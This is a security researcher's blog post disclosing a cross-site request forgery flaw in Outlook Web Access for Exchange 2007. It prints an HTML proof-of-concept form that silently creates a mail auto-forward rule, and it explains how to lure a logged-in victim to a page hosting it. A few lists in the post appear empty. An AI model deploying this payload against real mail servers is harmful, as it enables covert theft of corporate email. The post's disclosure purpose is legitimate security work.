After Nduja Connection worm and the Memova issue, it's now time to shed a light on vulnerabilities affecting corporate webmails.
And when corporate webmails are concerned, a unique name springs to mind: Outlook Web Access.
No doubt that Microsoft OWA is the most adopted solution for accessing corporate web mail (wherever MS Exchange is the mail server) and is as well used in some consumer webmail applications (eg. Alice webmail from Telecom Italia).
This time the threat comes from insufficient validation of HTTP requests sent to OWA by authenticated users...ehm..well, ok it's a CSRF vulnerability...
As CSRF issues have been already deeply discussed in web security literature, I'll give no further explanations on this topic, so let's dive into the specific details of the OWA issue.
Basicly OWA for Exchange 2007 implements no protection against CSRF:
this means that ANY web page visited by an user within a valid OWA session can trigger valid requests towards OWA and completely pwn the victim's mail account.
Among the nefarious effects of this attacks:
Here is the html snipplet that performs the POST request for setting the auto-forward rule:
<form name="myform" method="post" enctype="text/plain" action=https://webmail.mycorporation.com/owa/ev.owa?oeh=1&ns=Rule&ev=Save>
<input type="hidden" name='<params><Id></Id><Name>Test</Name><RecpA4><item><Rcp DN="firstname.lastname@example.org" EM="email@example.com" RT="SMTP" AO="3"></Rcp></item></RecpA4><Actions><item><rca t="4"></rca></item></Actions></params>' value="">
The code is quite straightforward, so you just need to put it on a web page, send the link to an OWA user, convince him to visit it and...he's pwned.
Interesting to notice here, this CSRF is performed through some kind of XML cross site POST; all the POST data are sent using the "name" parameter and leaving blank the "value".
It seems that the server-side XML parser tolerate the trailing "=" character at the end of the POST.
Just to have a picture of the potential victims of this bug, try googling:
Well....a lot of mil, gov and com organizations are using OWA 2007 and, as long as they don't install SP3, their corporate email communications are at risk.
Welcome to the low-cost corporate espionage era.
Here is a video PoC for setting an forward rule : basicly the victim is lured through social engineering to visit a specially crafted webpage while he has an active session on OWA.
I'd like to point out that, due to the sensitive domain of this vulnerabilty, I've walked the road of responsable disclosure with Microsoft.
I originally found the vulnerabilty on September 2009 and I immediately reported the issue to MS.